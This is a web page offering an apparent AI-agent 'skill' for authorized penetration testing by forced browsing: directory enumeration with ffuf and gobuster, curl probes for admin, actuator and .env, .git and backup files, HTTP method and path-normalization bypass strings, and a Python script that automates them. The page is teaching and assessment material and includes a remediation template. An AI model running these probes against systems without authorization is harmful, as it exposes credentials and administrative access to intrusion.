web application security

Bypassing Authentication with Forced Browsing

Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.

authentication-bypassdirectory-enumerationffufforced-browsingowasppenetration-testing
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

When to Use

  • During authorized penetration tests to discover hidden or unprotected administrative pages
  • When testing whether authentication is consistently enforced across all application endpoints
  • For identifying backup files, configuration files, and debug interfaces left exposed in production
  • When assessing access control on API endpoints that should require authentication
  • During security audits to validate that all sensitive resources enforce session validation

Prerequisites

  • Authorization: Written penetration testing agreement covering directory enumeration
  • ffuf: Fast web fuzzer (go install github.com/ffuf/ffuf/v2@latest)
  • Gobuster: Directory brute-force tool (apt install gobuster)
  • Burp Suite: For intercepting and analyzing requests and responses
  • Wordlists: SecLists collection (git clone https://github.com/danielmiessler/SecLists.git)
  • Target access: Network connectivity and valid test credentials for authenticated comparison

Workflow

Step 1: Enumerate Hidden Directories and Files

Use ffuf or Gobuster to discover paths not linked in the application's navigation.

# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-dirs.json -of json \
  -t 50 -rate 100
 
# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
  -mc 200,301,302,403 \
  -fc 404 \
  -o results-files.json -of json \
  -t 50 -rate 100
 
# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -s "200,204,301,302,307,403" \
  -x php,asp,aspx,jsp,html \
  -o gobuster-results.txt \
  -t 50

Step 2: Discover Administrative and Debug Interfaces

Target common administrative paths and debug endpoints.

# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -mc 200,301,302 \
  -t 50 -rate 100
 
# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status
 
# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403 \
  -fc 404 \
  -o api-results.json -of json
 
# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
  curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
    "https://target.example.com/actuator/$endpoint"
done

Step 3: Test Authentication Enforcement on Discovered Endpoints

Compare responses between unauthenticated and authenticated requests.

# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
  "https://target.example.com/admin/dashboard"
 
# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
  -b "session=valid_session_token_here" \
  "https://target.example.com/admin/dashboard"
 
# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
 
# Authenticated request
curl -s -b "session=valid_token" \
  "https://target.example.com/admin/users" | wc -c
 
# If both return similar content, authentication is not enforced
 
# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses

Step 4: Test HTTP Method-Based Authentication Bypass

Some applications only enforce authentication for specific HTTP methods.

# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
  echo -n "$method: "
  curl -s -o /dev/null -w "%{http_code}" \
    -X "$method" "https://target.example.com/admin/settings"
done
 
# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
  -X POST \
  -H "X-HTTP-Method-Override: GET" \
  "https://target.example.com/admin/settings"
 
curl -s -o /dev/null -w "%{http_code}" \
  -H "X-Original-Method: GET" \
  -H "X-Rewrite-URL: /admin/settings" \
  "https://target.example.com/"

Step 5: Test Path Traversal and URL Normalization Bypass

Exploit URL parsing differences to bypass path-based authentication rules.

# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
 
# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
 
# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"

Step 6: Discover Backup and Configuration Files

Search for sensitive files inadvertently exposed on the web server.

# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
  -e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
  -mc 200 -t 50 -rate 100
 
# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
  web.config wp-config.php.bak config.php.old \
  database.yml .htpasswd server-status phpinfo.php \
  robots.txt sitemap.xml crossdomain.xml; do
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://target.example.com/$file")
  if [ "$status" != "404" ]; then
    echo "FOUND ($status): $file"
  fi
done
 
# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed

Key Concepts

Concept Description
Forced Browsing Directly accessing URLs that are not linked but exist on the server
Directory Enumeration Brute-forcing directory and file names against a wordlist to discover hidden content
Authentication Bypass Accessing protected resources without valid credentials due to missing access checks
Path Normalization Exploiting differences in how web servers and application frameworks parse URL paths
Method-based Bypass Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks
Information Disclosure Exposure of sensitive configuration files, backups, or debug interfaces
Defense in Depth Layered security controls where authentication is enforced at multiple levels

Tools & Systems

Tool Purpose
ffuf Fast web fuzzer for directory, file, and parameter enumeration
Gobuster Directory and DNS brute-forcing tool written in Go
Feroxbuster Recursive content discovery tool with automatic recursion
DirBuster OWASP Java-based directory brute-force tool with GUI
Burp Suite HTTP proxy for request interception and automated scanning
SecLists Comprehensive collection of wordlists for security testing

Common Scenarios

Scenario 1: Exposed Admin Panel

An admin panel at /admin/ is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.

Scenario 2: Unprotected API Endpoints

API endpoints at /api/v1/users and /api/v1/settings require authentication in the frontend application but the backend API does not enforce session validation, allowing unauthenticated direct access.

Scenario 3: Backup File Containing Credentials

A developer left config.php.bak on the production server. This backup file contains database credentials in plaintext, discovered through extension-based enumeration.

Scenario 4: Spring Boot Actuator Exposure

The /actuator/env endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets.

Output Format

## Forced Browsing / Authentication Bypass Finding
 
**Vulnerability**: Missing Authentication on Administrative Interface
**Severity**: Critical (CVSS 9.1)
**Location**: /admin/dashboard (GET, no authentication required)
**OWASP Category**: A01:2021 - Broken Access Control
 
### Discovered Unprotected Resources
| Path | Status | Auth Required | Content |
|------|--------|---------------|---------|
| /admin/dashboard | 200 | No | Full admin panel |
| /admin/users | 200 | No | User management |
| /actuator/env | 200 | No | Environment variables |
| /config.php.bak | 200 | No | Database credentials |
| /.git/HEAD | 200 | No | Git repository metadata |
 
### Impact
- Unauthenticated access to administrative functions
- Ability to create, modify, and delete user accounts
- Exposure of database credentials and API keys
- Full source code disclosure via exposed Git repository
 
### Recommendation
1. Implement authentication checks at the server/middleware level for all admin routes
2. Remove backup files, debug endpoints, and version control metadata from production
3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
4. Implement IP-based access restrictions for administrative interfaces
5. Use a reverse proxy to restrict access to internal-only endpoints
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 1

api-reference.md2.2 KB

API Reference: Forced Browsing Authentication Bypass Agent

Overview

Tests web applications for unprotected endpoints, authentication bypass via HTTP methods and path normalization, and exposed sensitive files. For authorized penetration testing only.

Dependencies

Package Version Purpose
requests >=2.28 HTTP requests to target endpoints

CLI Usage

# Test common admin paths
python agent.py --target https://target.example.com --admin-paths --session-cookie <token>
 
# Test with custom wordlist
python agent.py --target https://target.example.com --wordlist /path/to/wordlist.txt

Arguments

Argument Required Description
--target Yes Target base URL
--wordlist No Path to directory/file wordlist
--session-cookie No Valid session cookie for authenticated comparison
--admin-paths No Use built-in common admin path list
--output No Output file (default: forced_browsing_report.json)

Key Functions

test_endpoint(base_url, path, session_cookie)

Tests an endpoint with and without authentication, comparing response status and size to detect auth bypass.

enumerate_directories(base_url, wordlist, session_cookie)

Iterates through wordlist paths, recording responses with status 200, 301, 302, or 403.

test_http_method_bypass(base_url, path)

Tests GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD on protected endpoints to find method-based bypasses.

test_path_traversal_bypass(base_url, path)

Tests URL normalization variants (case changes, path traversal, encoding, semicolons) against protected paths.

check_sensitive_files(base_url)

Checks for exposed .env, .git, backup files, and configuration files.

generate_report(findings, method_results, sensitive_files)

Compiles all findings into a structured JSON pentest report.

Output Schema

{
  "total_endpoints_found": 15,
  "auth_bypass_candidates": [{"path": "/admin", "unauth_status": 200}],
  "accessible_without_auth": [...],
  "http_method_bypass": {"/admin": {"GET": 403, "PUT": 200}},
  "sensitive_files_exposed": [{"path": ".env", "size": 1024}]
}

Scripts 1

agent.py6.7 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
# For authorized penetration testing and lab environments only
"""Forced Browsing Authentication Bypass Agent - Tests for unprotected endpoints."""

import json
import logging
import argparse
from datetime import datetime
from urllib.parse import urljoin

import requests

logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)

DEFAULT_ADMIN_PATHS = [
    "/admin", "/administrator", "/admin-panel", "/wp-admin", "/cpanel",
    "/phpmyadmin", "/adminer", "/manager", "/console", "/debug",
    "/actuator", "/actuator/env", "/actuator/health", "/actuator/beans",
    "/swagger-ui", "/swagger-ui.html", "/api-docs", "/graphql", "/graphiql",
    "/.env", "/server-status", "/server-info", "/.git/HEAD", "/.git/config",
    "/web.config", "/phpinfo.php", "/robots.txt", "/sitemap.xml",
]

SENSITIVE_EXTENSIONS = [
    ".bak", ".old", ".orig", ".save", ".swp", ".tmp", ".config",
    ".sql", ".gz", ".tar", ".zip", ".env",
]


def load_wordlist(wordlist_path):
    """Load directory/file wordlist from file."""
    with open(wordlist_path, "r") as f:
        return [line.strip() for line in f if line.strip() and not line.startswith("#")]


def test_endpoint(base_url, path, session_cookie=None, timeout=10):
    """Test a single endpoint with and without authentication."""
    url = urljoin(base_url, path)
    unauth_resp = requests.get(url, timeout=timeout, allow_redirects=False, verify=False)

    auth_resp = None
    if session_cookie:
        auth_resp = requests.get(
            url, cookies={"session": session_cookie},
            timeout=timeout, allow_redirects=False, verify=False,
        )

    result = {
        "path": path,
        "url": url,
        "unauth_status": unauth_resp.status_code,
        "unauth_size": len(unauth_resp.content),
    }
    if auth_resp:
        result["auth_status"] = auth_resp.status_code
        result["auth_size"] = len(auth_resp.content)
        result["auth_bypass"] = (
            unauth_resp.status_code == 200 and auth_resp.status_code == 200
            and abs(result["unauth_size"] - result["auth_size"]) < 100
        )
    return result


def enumerate_directories(base_url, wordlist, session_cookie=None):
    """Enumerate directories and test authentication enforcement."""
    findings = []
    for word in wordlist:
        path = f"/{word}" if not word.startswith("/") else word
        try:
            result = test_endpoint(base_url, path, session_cookie)
            if result["unauth_status"] in (200, 301, 302, 403):
                findings.append(result)
                logger.info(
                    "Found: %s (status: %d, size: %d)",
                    path, result["unauth_status"], result["unauth_size"],
                )
        except requests.RequestException:
            continue
    return findings


def test_http_method_bypass(base_url, path):
    """Test HTTP method-based authentication bypass."""
    methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD"]
    results = {}
    for method in methods:
        try:
            resp = requests.request(method, urljoin(base_url, path), timeout=10, verify=False)
            results[method] = resp.status_code
        except requests.RequestException:
            results[method] = None
    logger.info("Method bypass test for %s: %s", path, results)
    return results


def test_path_traversal_bypass(base_url, path):
    """Test path normalization bypass techniques."""
    variants = [
        path,
        path.upper(),
        path.replace("/", "/./"),
        f"/public/..{path}",
        path.replace("/", "%2f"),
        f"/;{path}",
        f"/.;{path}",
        f"{path}/",
        f"{path}.json",
    ]
    results = []
    for variant in variants:
        try:
            resp = requests.get(urljoin(base_url, variant), timeout=10, verify=False)
            results.append({"path": variant, "status": resp.status_code, "size": len(resp.content)})
        except requests.RequestException:
            continue
    return results


def check_sensitive_files(base_url):
    """Check for exposed backup and configuration files."""
    sensitive_paths = [
        ".env", ".git/HEAD", ".git/config", "web.config", "wp-config.php.bak",
        "config.php.old", ".htpasswd", "database.yml", "phpinfo.php",
    ]
    exposed = []
    for path in sensitive_paths:
        try:
            resp = requests.get(urljoin(base_url, path), timeout=10, verify=False)
            if resp.status_code == 200 and len(resp.content) > 0:
                exposed.append({"path": path, "status": resp.status_code, "size": len(resp.content)})
                logger.warning("EXPOSED: %s (size: %d bytes)", path, len(resp.content))
        except requests.RequestException:
            continue
    return exposed


def generate_report(findings, method_results, sensitive_files):
    """Generate pentest finding report for forced browsing results."""
    report = {
        "timestamp": datetime.utcnow().isoformat(),
        "total_endpoints_found": len(findings),
        "auth_bypass_candidates": [f for f in findings if f.get("auth_bypass")],
        "accessible_without_auth": [f for f in findings if f["unauth_status"] == 200],
        "http_method_bypass": method_results,
        "sensitive_files_exposed": sensitive_files,
    }
    bypasses = len(report["auth_bypass_candidates"])
    logger.info("Report: %d endpoints, %d auth bypasses, %d sensitive files",
                len(findings), bypasses, len(sensitive_files))
    return report


def main():
    parser = argparse.ArgumentParser(description="Forced Browsing Authentication Bypass Agent")
    parser.add_argument("--target", required=True, help="Target base URL")
    parser.add_argument("--wordlist", help="Path to wordlist file")
    parser.add_argument("--session-cookie", help="Valid session cookie for auth comparison")
    parser.add_argument("--admin-paths", action="store_true", help="Test common admin paths")
    parser.add_argument("--output", default="forced_browsing_report.json")
    args = parser.parse_args()

    wordlist = DEFAULT_ADMIN_PATHS if args.admin_paths else []
    if args.wordlist:
        wordlist = load_wordlist(args.wordlist)

    findings = enumerate_directories(args.target, wordlist, args.session_cookie)
    method_results = {}
    for f in findings:
        if f["unauth_status"] in (401, 403):
            method_results[f["path"]] = test_http_method_bypass(args.target, f["path"])

    sensitive = check_sensitive_files(args.target)
    report = generate_report(findings, method_results, sensitive)

    with open(args.output, "w") as f:
        json.dump(report, f, indent=2)
    logger.info("Report saved to %s", args.output)


if __name__ == "__main__":
    main()
Keep exploring